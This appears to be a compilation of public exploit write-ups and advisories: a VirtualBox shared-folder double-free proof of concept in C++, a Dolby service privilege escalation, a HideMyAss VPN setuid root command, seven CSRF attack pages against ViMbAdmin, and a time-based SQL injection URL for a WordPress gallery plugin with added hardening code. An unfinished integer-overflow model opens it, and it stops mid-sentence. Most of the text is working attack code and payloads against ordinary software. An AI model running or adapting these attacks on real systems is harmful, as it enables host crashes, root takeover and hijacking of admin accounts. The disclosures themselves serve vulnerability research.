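/* Checked version: reports failure instead of producing a wrapped length. */
bool checked_new_length(unsigned startIndex, unsigned otherLength, unsigned *newLength)
{
    if (otherLength > UINT32_MAX - startIndex)
        return false;
    *newLength = startIndex + otherLength;
    return true;
}

/* Runs one concat over a list of source-array lengths, starting at resultIndex 0,
 * advancing resultIndex the unchecked way the report describes.
 * Returns the index of the first array whose append wraps resultIndex, or -1.
 * *wrapped receives the final unchecked value, *exact the true 64-bit total. */
int find_overflowing_append(const unsigned *lengths, size_t count,
                            unsigned *wrapped, uint64_t *exact)
{
    unsigned resultIndex = 0;
    uint64_t total = 0;
    int first_bad = -1;
    for (size_t i = 0; i < count; i++) {
        unsigned next;
        if (first_bad < 0 && !checked_new_length(resultIndex, lengths[i], &next))
            first_bad = (int)i;
        resultIndex = unchecked_new_length(resultIndex, lengths[i]);
        total += lengths[i];
    }
    *wrapped = resultIndex;
    *exact = total;
    return first_bad;
}

/* Builds the PoC's source list: `this` (b), 4094 more copies of b, then c, then q.
 * Lengths are the ones the PoC sets: b = 0x100000, c = 0xfffef, q = 0x1000. */
#define POC_ARRAY_COUNT (1 + 4094 + 1 + 1)
size_t build_poc_lengths(unsigned *out, size_t cap)
{
    if (cap < POC_ARRAY_COUNT)
        return 0;
    size_t n = 0;
    for (size_t i = 0; i < 1 + 4094; i++)
        out[n++] = 0x100000u; /* b and its copies */
    out[n++] = 0xfffefu;      /* c, the shorter undecided array */
    out[n++] = 0x1000u;       /* q, the array of 7s that overflows the index */
    return n;
}

int main(void)
{
    unsigned lengths[POC_ARRAY_COUNT];
    size_t n = build_poc_lengths(lengths, POC_ARRAY_COUNT);
    unsigned wrapped;
    uint64_t exact;
    int bad = find_overflowing_append(lengths, n, &wrapped, &exact);
    printf("true length 0x%llx, unchecked newLength 0x%x, overflow at source %d\n",
           (unsigned long long)exact, wrapped, bad);
    return 0;
}
```

The 4095 copies of b sum to 0xFFF00000, c brings resultIndex to 0xFFFFFFEF, and appending q wraps it to 0xFEF, so the result buffer is allocated far smaller than the 0x1000 elements then copied into it.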
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1227
We have discovered a heap double-free vulnerability in the latest version of VirtualBox (5.1.18), with Guest Additions (and more specifically shared folders) enabled in the guest operating system. The heap memory corruption takes place in the VirtualBox.exe process running on a Windows host (other host platforms were untested). It can be triggered from an unprivileged ring-3 process running in a Windows guest, by performing two nt!NtQueryDirectoryFile system calls [1] against a shared (sub)directory one after another: the first one with the ReturnSingleEntry argument set to FALSE, and the next one with ReturnSingleEntry=TRUE. During the second system call, a double free takes place and the VM execution is aborted.
We have confirmed that the vulnerability reproduces with Windows 7/10 32-bit as the guest, and Windows 7 64-bit as the host system, but haven’t checked other configurations. However, it seems very likely that the specific version of Windows as the guest/host is irrelevant.
It also seems important for reproduction that the shared directory being queried has some files (preferably a few dozen) inside of it. The attached Proof of Concept program (written in C++, can be compiled with Microsoft Visual Studio) works by first creating a dedicated directory in the shared folder (called “vbox_crash”), and then creating 16 files with ~128 byte long names, which appears to be sufficient to always trigger the bug. Finally, it invokes the nt!NtQueryDirectoryFile syscall twice, leading to a VM crash. While the PoC requires write access to the shared folder to set up reliable conditions, it is probably not necessary in practical scenarios, as long as the shared folder already contains some files (which is most often the case).
If we assume that the shared folder is mounted as drive E, we can start the PoC as follows:
>VirtualBoxKiller.exe E:\
Immediately after pressing "enter", the virtual machine should be aborted. The last two lines of the VBoxHardening.log file corresponding to the VM should be similar to the following:
--- cut ---
3e28.176c: supR3HardNtChildWaitFor[2]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468037 ms, the end);
1020.3404: supR3HardNtChildWaitFor[1]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468638 ms, the end);
--- cut ---
The 0xc0000374 exit code above translates to STATUS_HEAP_CORRUPTION. A summary of the crash and the corresponding stack trace is as follows:
--- cut ---
1: kd> g
Critical error detected c0000374
Break instruction exception - code 80000003 (first chance)
ntdll!RtlReportCriticalFailure+0x2f:
0033:00000000`76f3f22f cc int 3
1: kd> kb
RetAddr : Args to Child : Call Site
00000000`76f3f846 : 00000000`00000002 00000000`00000023 00000000`00000087 00000000`00000003 : ntdll!RtlReportCriticalFailure+0x2f
00000000`76f40412 : 00000000`00001010 00000000`03a50000 00000000`00001000 00000000`00001000 : ntdll!RtlpReportHeapFailure+0x26
00000000`76f42084 : 00000000`03a50000 00000000`05687df0 00000000`00000000 00000000`038d0470 : ntdll!RtlpHeapHandleError+0x12
00000000`76eda162 : 00000000`05687de0 00000000`00000000 00000000`00000000 000007fe`efc8388b : ntdll!RtlpLogHeapFailure+0xa4
00000000`76d81a0a : 00000000`00000000 00000000`03f0e1b0 00000000`111fdd40 00000000`00000000 : ntdll!RtlFreeHeap+0x72
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`08edf790 00000000`05661c00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`03f0e1b0 : MSVCR100!free+0x1c
000007fe`f4613a96 : 00000000`05661d16 00000000`00000000 00000000`00000000 00000000`05687df0 : VBoxRT+0xc8fef
000007fe`f4611a48 : 00000000`056676d0 00000000`08edf830 00000000`00000000 00000000`05661c98 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee885c22 : 00000000`111fdd30 00000000`111fdd30 00000000`03f352b0 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee884a2c : 00000000`00000000 00000000`111fdd30 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`05747fe0 00000000`00000da4 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`05737e90 00000000`05737e90 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`05737e90 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`05737e90 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
When the "Heaps" option is enabled for VirtualBox.exe in Application Verifier, the crash is reported in the following way:
--- cut ---
1: kd> g
=======================================
VERIFIER STOP 0000000000000007: pid 0xC08: Heap block already freed.
000000000DCB1000 : Heap handle for the heap owning the block.
000000001C37E000 : Heap block being freed again.
0000000000000000 : Size of the heap block.
0000000000000000 : Not used
=======================================
This verifier stop is not continuable. Process will be terminated
when you use the `go' debugger command.
=======================================
1: kd> kb
RetAddr : Args to Child : Call Site
000007fe`f42437ee : 00000000`00000000 00000000`1c37e000 000007fe`f42415a8 000007fe`f42520b0 : ntdll!DbgBreakPoint
000007fe`f4249970 : 00000000`265cf5b8 00000000`00000007 00000000`0dcb1000 00000000`1c37e000 : vrfcore!VerifierStopMessageEx+0x772
000007fe`f302931d : 00000000`1c186a98 00000000`00000000 00000000`265cf520 00100000`265cf520 : vrfcore!VfCoreRedirectedStopMessage+0x94
000007fe`f3026bc1 : 00000000`0dcb1000 00000000`1c37e000 00000000`00000000 00000000`0dcb1000 : verifier!AVrfpDphReportCorruptedBlock+0x155
000007fe`f3026c6f : 00000000`0dcb1000 00000000`1c37e000 00000000`0dcb1000 00000000`00002000 : verifier!AVrfpDphFindBusyMemoryNoCheck+0x71
000007fe`f3026e45 : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`1717ed08 : verifier!AVrfpDphFindBusyMemory+0x1f
000007fe`f302870e : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`0dcb1038 : verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
00000000`76f440d5 : 00000000`00000000 00000000`00000000 00000000`00001000 00000000`00000000 : verifier!AVrfDebugPageHeapFree+0x8a
00000000`76ee796c : 00000000`0dcb0000 00000000`00000000 00000000`0dcb0000 00000000`00000000 : ntdll!RtlDebugFreeHeap+0x35
00000000`76d81a0a : 00000000`0dcb0000 000007fe`efc41b01 00000000`00000000 00000000`1c37e000 : ntdll! ?? ::FNODOBFM::`string'+0xe982
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`265cfb10 00000000`1c341f00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`67e40fe0 : MSVCR100!free+0x1c
000007fe`f4923a96 : 00000000`1c342076 00000000`00000000 00000000`00000000 00000000`1c37e000 : VBoxRT+0xc8fef
000007fe`f4921a48 : 00000000`5c774ff0 00000000`265cfbb0 00000000`00000000 00000000`1c341ff8 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee595c22 : 00000000`63097f60 00000000`63097f60 00000000`25f81f30 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee594a2c : 00000000`00000000 00000000`63097f60 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`25339730 00000000`000004c8 00000000`00000000 00000000`1dce4d30 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`1dce4d30 00000000`1dce4d30 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`1dce4d30 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`1dce4d30 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
Due to the nature of the flaw (heap memory corruption), it could potentially make it possible for an unprivileged guest program to escape the VM and execute arbitrary code on the host, hence we consider it to be a high-severity issue.
References:
[1] ZwQueryDirectoryFile routine, https://msdn.microsoft.com/en-us/library/windows/hardware/ff567047(v=vs.85).aspx
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
#include <time.h>
extern "C"
NTSTATUS WINAPI NtQueryDirectoryFile(
  _In_ HANDLE FileHandle,
  _In_opt_ HANDLE Event,
  _In_opt_ PIO_APC_ROUTINE ApcRoutine,
  _In_opt_ PVOID ApcContext,
  _Out_ PIO_STATUS_BLOCK IoStatusBlock,
  _Out_ PVOID FileInformation,
  _In_ ULONG Length,
  _In_ FILE_INFORMATION_CLASS FileInformationClass,
  _In_ BOOLEAN ReturnSingleEntry,
  _In_opt_ PUNICODE_STRING FileName,
  _In_ BOOLEAN RestartScan
);

typedef struct _FILE_DIRECTORY_INFORMATION {
  ULONG NextEntryOffset;
  ULONG FileIndex;
  LARGE_INTEGER CreationTime;
  LARGE_INTEGER LastAccessTime;
  LARGE_INTEGER LastWriteTime;
  LARGE_INTEGER ChangeTime;
  LARGE_INTEGER EndOfFile;
  LARGE_INTEGER AllocationSize;
  ULONG FileAttributes;
  ULONG FileNameLength;
  WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;

int main(int argc, char **argv) {
  // Validate command line format.
  if (argc != 2) {
    printf("Usage: %s <path to a writable shared folder>\n", argv[0]);
    return 1;
  }

  // Initialize the PRNG.
  srand((unsigned int)time(NULL));

  // Create a subdirectory dedicated to demonstrating the vulnerability.
  CHAR TmpDirectoryName[MAX_PATH];
  _snprintf_s(TmpDirectoryName, sizeof(TmpDirectoryName), "%s\\vbox_crash", argv[1]);
  if (!CreateDirectoryA(TmpDirectoryName, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) {
    printf("CreateDirectory failed, %d\n", GetLastError());
    return 1;
  }

  // Create 16 files with long (128-byte) names, which appears to always be sufficient to trigger the bug.
  CONST UINT kTempFilesCount = 16;
  CONST UINT kTempFilenameLength = 128;
  CHAR TmpFilename[kTempFilenameLength + 1], TmpFilePath[MAX_PATH];
  memset(TmpFilename, 'A', kTempFilenameLength);
  TmpFilename[kTempFilenameLength] = '\0';
  for (UINT i = 0; i < kTempFilesCount; i++) {
    _snprintf_s(TmpFilePath, sizeof(TmpFilePath), "%s\\%s.%u", TmpDirectoryName, TmpFilename, rand());
    HANDLE hFile = CreateFileA(TmpFilePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
      printf("CreateFile#1 failed, %d\n", GetLastError());
      return 1;
    }
    CloseHandle(hFile);
  }

  // Open the temporary directory.
  HANDLE hDirectory = CreateFileA(TmpDirectoryName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
  if (hDirectory == INVALID_HANDLE_VALUE) {
    printf("CreateFile#2 failed, %d\n", GetLastError());
    return 1;
  }

  IO_STATUS_BLOCK iosb;
  FILE_DIRECTORY_INFORMATION fdi;

  // Perform the first call, with ReturnSingleEntry set to FALSE.
  NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, FALSE, NULL, TRUE);

  // Now make the same call, but with ReturnSingleEntry=TRUE. This should crash VirtualBox.exe on the host with a double-free exception.
  NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, TRUE, NULL, TRUE);

  // We should never reach here.
  CloseHandle(hDirectory);
  return 0;
}
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075
Windows: Dolby Audio X2 Service Elevation of Privilege
Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.
Class: Elevation of Privilege
Summary:
The DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.
Description:
The DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There’s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.
Microsoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.
Proof of Concept:
To demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.
1) From a command prompt run the command “ExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad”
2) Check the currently running processes for the privileged copy of notepad.
Expected Result:
No privilege escalation occurs.
Observed Result:
An instance of notepad is running at system privileges.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41933.zip
Source: https://www.securify.nl/advisory/SFY20170402/multiple_local_privilege_escalation_vulnerabilities_in_hidemyass_pro_vpn_client_v2_x_for_os_x.html
Abstract
Multiple local privilege escalation vulnerabilities were found in the helper binary HMAHelper that ships with HideMyAss Pro VPN for OS X. The helper is installed setuid root and responsible for loading Kernel Extensions (kext) and managing VPN firewall rules. These issues can be leveraged by a local attacker to gain elevated (root) privileges.
Tested versions:
This issue was tested on HMA Pro VPN version 2.2.7.0 for OS X.
Fix:
HMA Support has reported that this issue will not be fixed. Version 2.2.7.0 is still available for download and was earlier this year also available in the Mac App Store. It seems that this version is still available for older versions of OS X (OS X 10.7 - 10.11).
It should be noted that the latest version of HMA Pro VPN for OS X (version 3.3.0.3) is vulnerable to a similar local privilege escalation issue that is also not fixed at the time of writing.
Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for OS X. It was discovered that version 2.x of HMA Pro VPN for OS X is affected by multiple local privilege escalation vulnerabilities.
Details:
The helper binary HMAHelper that ships with HMA Pro VPN for OS X is installed as setuid root. The helper has the ability to execute several commands as root, including loading kernel extensions (kext) as well as enabling and disabling firewall rules.
Although being able to disable the firewall is dangerous enough, it was found that the helper is affected by multiple local privilege escalation vulnerabilities. Taking the FirewallDisable rule as an example, the code snippet below shows that there is no restriction on which executable can be executed, allowing a local user (or malware) to run any executable as root.
Privax.OSX.HMA.Helper.FirewallManager
private static void FirewallDisableSelected(string path, string args, string processNames)
{
  using (Process process = new Process())
  {
    ProcessStartInfo startInfo = process.StartInfo;
    startInfo.FileName = "/usr/bin/sudo";
    startInfo.Arguments = string.Format("\"{0}\" \"{1}\" \"{2}\"", (object) path, (object) args, (object) processNames);
    startInfo.CreateNoWindow = true;
    startInfo.UseShellExecute = false;
    PermissionsManager.PermissionsSet(PermissionsManager.UIDRoot, PermissionsManager.GIDWheel);
    process.Start();
    process.WaitForExit();
  }
}
Proof of concept:
/Applications/HMA\!\ Pro\ VPN.app/Contents/Resources/Applications/HMAHelper.app/Contents/MacOS/HMAHelper --sib-firewall-enable 'su' ''
# [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15
## Product Description
ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at http://www.vimbadmin.net and the source code of the application is available on github https://github.com/opensolutions.
## Details
**CVE ID**: CVE-2017-6086
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-352
**CVSS Base Score**: 8.8
**CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
## Proof of concept
### Add administrator user
#### Exploit
The following html/javascript code allows an attacker to add an administrator user. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/add" method="POST" target="csrf-frame" >
<input type="text" name="user" value="target@email" >
<input type="text" name="password" value="newpassword" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.
### Remove administrator user
#### Exploit
The following html/javascript code allows an attacker to delete an administrator user. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/purge/aid/<administrator id>" method="GET" target="csrf-frame" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.
### Change administrator password
#### Exploit
The following html/javascript code allows an attacker to change an administrator's password. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/password/aid/<administrator id>" method="POST" target="csrf-frame" >
<input type="text" name="password" value="newpassword" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `passwordAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.
### Add mailbox address
#### Exploit
The following html/javascript code allows an attacker to add a mailbox address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fakeemail>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="name" value="<fake name>" >
<input type="text" name="password" value="<password>" >
<input type="text" name="quota" value="0" >
<input type="text" name="alt_email" value="" >
<input type="text" name="cc_welcome_email" value="" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.
### Purge mailbox
#### Exploit
The following html/javascript code allows an attacker to remove a mailbox address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/purge/mid/<mailbox id>" method="POST" target="csrf-frame" >
<input type="text" name="data" value="purge" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.
### Archive mailbox
#### Exploit
The following html/javascript code allows an attacker to force the archival of a mailbox address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/archive/add/mid/<mailbox id>" method="GET" target="csrf-frame" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/ArchiveController.php` file.
### Add alias address
#### Exploit
The following html/javascript code allows an attacker to add an alias address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application. The equivalent request as a curl command:
```shell
curl 'http://<ip>/alias/add/did/<domain id>' --data 'local_part=<fake mailbox>&domain=<domain id>&goto%5B%5D=<redirection email address>'
```
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fake mailbox>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="goto[]" value="<redirection email address>" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.
### Remove alias address
#### Exploit
The following html/javascript code allows an attacker to remove an alias address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/delete/alid/<alias id>" method="GET" target="csrf-frame" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.
## Affected version
* tested on version 3.0.15
## Timeline (dd/mm/yyyy)
* 22/01/2017 : Initial discovery.
* 16/02/2017 : First contact with opensolutions.io
* 16/02/2017 : Advisory sent.
* 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.
* 13/03/2017 : Sysdream Labs request for an update.
* 29/03/2017 : Second request for an update.
* 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.
* 03/05/2017 : Full disclosure.
## Credits
* Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)
Source: http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
DefenseCode ThunderScan SAST Advisory
WordPress WebDorado Gallery Plugin - SQL Injection Vulnerability
Advisory ID: DC-2017-02-011
Software: WordPress WebDorado Gallery Plugin
Software Language: PHP
Version: 1.3.29 and below
Vendor Status: Vendor contacted, vulnerability confirmed
Release Date: 20170502
Risk: Medium
1. General Overview
During the security audit, multiple security vulnerabilities were discovered in the WordPress WebDorado Gallery Plugin using the DefenseCode ThunderScan application source code security analysis platform.
More information about ThunderScan is available at URL:
http://www.defensecode.com
2. Software Overview
According to the plugin developers, WebDorado, Gallery plugin is a fully responsive WordPress gallery plugin with advanced functionality that is easy to customize and has various views. It has more than 300,000 downloads on wordpress.org.
Homepage:
https://wordpress.org/plugins/photo-gallery/
https://web-dorado.com/products/wordpress-photo-gallery-plugin.html
3. Vulnerability Description
During the security analysis, ThunderScan discovered an SQL injection vulnerability in the WebDorado Gallery WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided URL while logged in as administrator or as another user that is authorized to access the plugin settings page. Any user with such privileges can obtain a valid bwg_nonce value by previously visiting the settings page. Users that do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to access.
3.1 SQL injection
Function: $wpdb->get_col($query)
Variable: $_GET['album_id']
Sample URL:
http://server/wp-admin/adminajax.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1
File: photo-gallery\admin\models\BWGModelAddAlbumsGalleries.php
26 $album_id = ((isset($_GET['album_id'])) ? esc_html(stripslashes($_GET['album_id'])) :
((isset($_POST['album_id'])) ? esc_html(stripslashes($_POST['album_id'])) : ''));
...
28 $page_nav = $this->model->page_nav($album_id);
File: photo-gallery\admin\views\BWGViewAddAlbumsGalleries.php
41 public function page_nav($album_id) {
...
44 $query = "SELECT id FROM " . $wpdb->prefix . "bwg_album WHERE published=1 AND id<>" .
$album_id . " " . $where . " UNION ALL SELECT id FROM " . $wpdb->prefix . "bwg_gallery WHERE
published=1 " . $where;
45 $total = count($wpdb->get_col($query));
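The point of the listing above is that esc_html()/stripslashes() are HTML-oriented and leave the album_id value intact before it is concatenated into the statement. The following Python model is an added example, not the plugin's code: it rebuilds the page_nav() query both ways, against a constructed in-memory SQLite stand-in for the two tables (the "wp_" prefix, the table contents and the absint()-style validator are assumptions).

```python
import html
import re
import sqlite3

# Constructed: the album_id value from the advisory's sample URL, URL-decoded.
ADVISORY_PAYLOAD = "0 AND (SELECT * FROM (SELECT(SLEEP(5)))VvZV)"
PREFIX = "wp_"  # assumed value of $wpdb->prefix


def esc_html(value):
    """Approximates WordPress esc_html(): it only encodes HTML-special
    characters, so it is the wrong tool for a value that ends up inside SQL."""
    return html.escape(value, quote=True)


def vulnerable_page_nav_query(album_id, where=""):
    """Mirrors the concatenation in page_nav(): whatever survives esc_html()
    is pasted straight into the statement."""
    return ("SELECT id FROM " + PREFIX + "bwg_album WHERE published=1 AND id<>"
            + esc_html(album_id) + " " + where + " UNION ALL SELECT id FROM "
            + PREFIX + "bwg_gallery WHERE published=1 " + where)


def safe_album_id(value):
    """Hardened input handling (the equivalent of WordPress absint()): accept
    only ASCII digits and return None otherwise so the caller can reject the
    request instead of building a query from it."""
    if value is None or not re.fullmatch(r"[0-9]+", value.strip()):
        return None
    return int(value)


def hardened_page_nav_query(album_id, where=""):
    """Returns (sql, params): the id is bound as a parameter, never
    concatenated. $where must itself be built only from trusted pieces."""
    album_id_int = safe_album_id(album_id)
    if album_id_int is None:
        raise ValueError("album_id must be a non-negative integer")
    sql = ("SELECT id FROM " + PREFIX + "bwg_album WHERE published=1 AND id<>? "
           + where + " UNION ALL SELECT id FROM " + PREFIX
           + "bwg_gallery WHERE published=1 " + where)
    return sql, (album_id_int,)


def make_sample_db():
    """Constructed in-memory stand-in for the two plugin tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE wp_bwg_album (id INTEGER, published INTEGER);"
        "CREATE TABLE wp_bwg_gallery (id INTEGER, published INTEGER);"
        "INSERT INTO wp_bwg_album VALUES (1,1),(2,1),(3,1),(4,0);"
        "INSERT INTO wp_bwg_gallery VALUES (10,1),(11,1),(12,0);"
    )
    return conn


def count_page_nav(album_id, conn=None):
    """Hardened equivalent of count($wpdb->get_col($query))."""
    conn = conn or make_sample_db()
    sql, params = hardened_page_nav_query(album_id)
    return len(conn.execute(sql, params).fetchall())


if __name__ == "__main__":
    print(vulnerable_page_nav_query(ADVISORY_PAYLOAD))  # injected clause survives
    print(safe_album_id(ADVISORY_PAYLOAD))               # None: request rejected
    print(count_page_nav("2"))                           # 4
```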
4. Solution
The vendor resolved the security issues in one of the subsequent releases. All users are strongly
advised to update the WordPress WebDorado Gallery plugin to the latest available version. Version
1.3.38 no longer seems to be vulnerable.
5. Credits
Discovered by Neven Biruski with DefenseCode ThunderScan source code security analyzer.
6. Disclosure Timeline
20170404 Vendor contacted
20170405 Vendor responded: “Thanks for noticing and told us about this, we will
take into account and will fix the issues with upcoming update.”
? Update released
20170502 Latest plugin version tested. Vulnerability seems fixed.
Advisory released to the public.
http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
7. About DefenseCode
DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop
and mobile applications for security vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing)
solution for performing extensive security audits of application source code. ThunderScan
performs fast and accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing)
solution for comprehensive security audits of active web applications. WebScanner will test a
